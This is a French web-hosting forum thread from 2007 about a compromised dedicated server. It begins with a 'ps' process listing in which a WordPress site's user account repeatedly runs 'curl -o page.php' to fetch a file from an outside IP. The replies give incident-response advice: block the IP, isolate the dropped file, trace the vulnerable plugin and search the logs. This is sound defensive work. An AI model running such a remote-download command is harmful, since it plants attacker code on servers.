mysql	27446  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27447  0.0  0.2   3244  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27448  0.2  2.5  24120 12936 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27449  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27450  0.0  0.2   3244  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27452  0.2  2.5  24120 12888 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27453  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27454  0.0  0.2   3240  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27456  0.2  2.5  24120 12892 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27457  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27459  0.0  0.2   3244  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27460  0.0  0.3   6080  1760 ?		S	13:49   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   27461  0.0  0.3   6080  1816 ?		S	13:49   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   27462  0.0  0.3   6080  1768 ?		S	13:49   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27463  0.2  2.5  24124 12940 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27464  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27465  0.0  0.2   3244  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27467  0.3  2.5  24120 12940 ?		S	13:49   0:00 /usr/local/php5/bin/php
mysql	27468  0.0  5.8 120900 29772 ?		S	13:49   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27469  0.0  0.2   3240  1476 ?		S	13:49   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27470  0.3  2.5  24120 12892 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27471  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27472  0.0  0.2   3240  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27495  0.3  2.5  24120 12936 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27496  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27497  0.0  0.2   3244  1480 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27498  0.0  0.3   6080  1768 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27500  0.3  2.5  24124 12896 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27501  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27502  0.0  0.2   3244  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27545  0.4  2.5  24120 12896 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27546  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27547  0.0  0.2   3240  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27548  0.4  2.5  24124 12940 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27549  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27551  0.0  0.2   3244  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27552  0.4  2.5  24124 12940 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27553  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27554  0.0  0.2   3244  1480 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27555  0.5  2.5  24124 12936 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27556  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27557  0.0  0.2   3240  1472 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27558  0.0  0.3   6128  1936 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27559  0.5  2.5  24120 12936 ?		S	13:50   0:00 /usr/local/php5/bin/php
mediabb  27560  0.5  2.5  24124 12944 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27561  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mysql	27562  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27563  0.0  0.2   3240  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27564  0.0  0.2   3240  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27565  0.0  0.3   6080  1816 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27566  0.5  2.5  24124 12940 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27567  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
nobody   27568  0.0  0.3   6080  1816 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   27569  0.0  0.3   6080  1816 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27570  0.0  0.2   3244  1480 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27571  0.6  2.5  24124 12940 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27572  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27573  0.0  0.2   3244  1480 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27574  0.0  0.3   6080  1816 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27577  0.7  2.5  24120 12936 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27578  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27579  0.0  0.2   3244  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27581  0.8  2.5  24124 12896 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27582  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27583  0.0  0.2   3244  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27584  1.2  2.5  24124 12896 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27585  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27586  0.0  0.2   3244  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27587  0.0  0.3   6080  1760 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27588  1.3  2.5  24120 12936 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27589  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27590  0.0  0.2   3244  1480 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27591  0.0  0.2   5948  1236 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   27592  0.0  0.2   5948  1224 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27593  1.3  2.5  24124 12940 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27594  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27595  0.0  0.2   3240  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
mediabb  27596  1.9  2.5  24124 12896 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27597  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27598  0.0  0.2   3240  1476 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
nobody   27599  0.0  0.2   5948  1224 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   27600  0.0  0.2   5948  1224 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
nobody   27601  0.0  0.2   5948  1224 ?		S	13:50   0:00 /usr/local/apache/bin/httpd -k start -DSSL
mediabb  27603  9.0  2.5  24120 12896 ?		S	13:50   0:00 /usr/local/php5/bin/php
mysql	27604  0.0  5.8 120900 29772 ?		S	13:50   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/va
mediabb  27605  0.0  0.2   3244  1480 ?		S	13:50   0:00 curl -o page.php 200.89.188.195/stnc.txt
root	 27606  0.0  0.1   2304   900 pts/0	R+   13:50   0:00 ps auxw

**Dan** · 2 Juin 2007

Tu pourrais commencer par killer tousles process curl lancés par un Argentin.

Et puis tu pourrais aussi blacklister son IP : 200.89.188.195

Ensuite, il faut regarder ce qu'il a déposé sur ton serveur... un fichier page.php (regarder ce que ça fait et ensuite le virer bien sûr)

Et puis, regarde aussi d'où il a lancé ce "curl"... un de tes scripts doit avoir une sérieuse faille.

Dan

bobdeo · 2 Juin 2007

Tu pourrais commencer par killer tousles process curl lancés par un Argentin.
Et puis tu pourrais aussi blacklister son IP : 200.89.188.195

Fait : iptables -A INPUT -s 200.89.188.195 -j DROP

Ensuite, il faut regarder ce qu'il a déposé sur ton serveur... un fichier page.php (regarder ce que ça fait et ensuite le virer bien sûr)

En faisant un "ps axu", j'ai vu que le user étati celui d'un site tournant sur Wordpress. Il héberge un page.php dans son template. J'ai isolé ce fichier.

Et puis, regarde aussi d'où il a lancé ce "curl"... un de tes scripts doit avoir une sérieuse faille.

Là... plus dur... comment faire ?

Merci pour ton aide

bobdeo · 2 Juin 2007

Ok je pense avoir trouvé la faille : un mauvais plugin de WP

Désactivé, les attaques cessent.

Pour ceux que ça intéresse, le plugin en question est Sitemaps generator v3b6.

Encore merci pour ton aide, Dan !

guymauve · 2 Juin 2007

OK merci pour l'info.

Ce serait intéressant de remonter l'info à la communauté francophone de WP

bobdeo · 2 Juin 2007

Ce serait intéressant de remonter l'info à la communauté francophone de WP

Fait ! :rolleyes:

guymauve · 2 Juin 2007

Tu pourrais commencer par killer tousles process curl lancés par un Argentin.
Et puis tu pourrais aussi blacklister son IP : 200.89.188.195

Ensuite, il faut regarder ce qu'il a déposé sur ton serveur... un fichier page.php (regarder ce que ça fait et ensuite le virer bien sûr)

Et puis, regarde aussi d'où il a lancé ce "curl"... un de tes scripts doit avoir une sérieuse faille.

Dan

C'est là que l'on reconnaît les pros ... La couleur du slip de l'argentin ??? :smartass:

Fait !

Nickel merci à toi.

**Dan** · 2 Juin 2007

C'est là que l'on reconnaît les pros ... La couleur du slip de l'argentin ???

Sale ! :lol:

Là... plus dur... comment faire ?

Il est facile de voir quelles sont les occurrences de son IP (200.89.188.195) ou son host (195-188-89-200.fibertel.com.ar) dans tes logs Apache, tu pourras le tracer complètement et regarder ce qu'il a fait (et au départ de quel site)

bobdeo · 2 Juin 2007

Il est facile de voir quelles sont les occurrences de son IP (200.89.188.195) ou son host (195-188-89-200.fibertel.com.ar) dans tes logs Apache, tu pourras le tracer complètement et regarder ce qu'il a fait (et au départ de quel site)

Je ne trouve rien avec ces IP... Sinon, je ne cherche pas au bon endroit. C'est bien les logs dans /home/log/httpd/ ?...

Modifié 2 Juin 2007 par bobdeo

**Dan** · 3 Juin 2007

Je ne trouve rien avec ces IP... Sinon, je ne cherche pas au bon endroit. C'est bien les logs dans /home/log/httpd/ ?...

Cela peut effectivement être n'importe lequel des fichiers _log ou _log.gz.* vu que tu ne connais pas la date.

Tu peux essayer de le trouver avec zgrep pour les fichiers compressés.

Connexion

Dédié : les process s'emballent et surchargent

Sujets conseillés

bobdeo

Dan

bobdeo

bobdeo

guymauve

bobdeo

guymauve

Dan

bobdeo

Dan

Veuillez vous connecter pour commenter

Parcourir

Activité